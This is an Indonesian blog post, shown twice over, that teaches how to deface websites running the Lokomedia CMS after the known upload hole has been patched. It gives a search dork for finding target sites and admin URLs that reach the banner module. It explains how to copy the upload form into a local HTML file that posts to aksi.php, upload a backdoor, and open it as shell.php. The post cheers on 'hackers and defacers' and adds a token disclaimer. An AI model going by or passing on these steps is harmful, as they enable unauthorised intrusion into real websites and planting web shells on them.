Bugs Template CMS Lokomedia After Patch
Arsyad-Cyber - Permasalahan yang dihadapi sekarang adalah jika admin sebuah website yang kita deface mengetahui celah websitenya dan melakukan sebuah tindakan yang dinamakan Patch. Jika hal tersebut terjadi hal seperti Deface Lokomedia sudah tidak berfungsi lagi, tapi jangan khawatir karena saya mempunyai bugs lain dalam deface Lokomedia.
Dork : allinurl:media.php?module=berita
Pilih suatu web yang menurut anda bisa di deface dengan lokomedia , ingat !!! tutorial selanjutnya itu sama dengan artikel Deface Dengan Lokomedia tetapi masalahnya ketika anda pasang banner tempat upload nya tidak ada karena sudah di patch.
http://www.target.com/admin/content.php?module=banner
Langsung ganti url web target nya menjadi sperti berikut :
http://www.target.com/admin/modul/mod_banner.php
Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :
./aksi.php?module=banner&act=input
Kemudian ganti dengan
http://www.target.com/admin/aksi.php?module=banner&act=input
Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :
http://www.target.com/admin/foto_berita/shell.php
Setelah itu terserah kreasi anda sendiri yang mempunyai backdoor menjadi hak utuh milik anda , kami hanya share ilmu yang kami tahu dan tidak untuk membahayakan dan merugikan pihak lain bahkan resiko anda sendiri yang menanggungnya. Dan Untuk admin website Lokomedia saya harapkan untuk menutup bugs tersebut agar website anda aman dari serangan defacer yang banyak di dunia maya ini. Semoga Bermanfaat untuk anda semua.
Happy To Hacker And Defacer , Its All About Your'e Brian !!!
Sumber : Disini
Arsyad-Cyber - Permasalahan yang dihadapi sekarang adalah jika admin sebuah website yang kita deface mengetahui celah websitenya dan melakukan sebuah tindakan yang dinamakan Patch. Jika hal tersebut terjadi hal seperti Deface Lokomedia sudah tidak berfungsi lagi, tapi jangan khawatir karena saya mempunyai bugs lain dalam deface Lokomedia.
Dork : allinurl:media.php?module=berita
Pilih suatu web yang menurut anda bisa di deface dengan lokomedia , ingat !!! tutorial selanjutnya itu sama dengan artikel Deface Dengan Lokomedia tetapi masalahnya ketika anda pasang banner tempat upload nya tidak ada karena sudah di patch.
http://www.target.com/admin/content.php?module=banner
Langsung ganti url web target nya menjadi sperti berikut :
http://www.target.com/admin/modul/mod_banner.php
Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :
./aksi.php?module=banner&act=input
Kemudian ganti dengan
http://www.target.com/admin/aksi.php?module=banner&act=input
Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :
http://www.target.com/admin/foto_berita/shell.php
Setelah itu terserah kreasi anda sendiri yang mempunyai backdoor menjadi hak utuh milik anda , kami hanya share ilmu yang kami tahu dan tidak untuk membahayakan dan merugikan pihak lain bahkan resiko anda sendiri yang menanggungnya. Dan Untuk admin website Lokomedia saya harapkan untuk menutup bugs tersebut agar website anda aman dari serangan defacer yang banyak di dunia maya ini. Semoga Bermanfaat untuk anda semua.
Happy To Hacker And Defacer , Its All About Your'e Brian !!!
Sumber : Disini
Hargai karya orang lain dengan memasang sumber setelah mengcopy
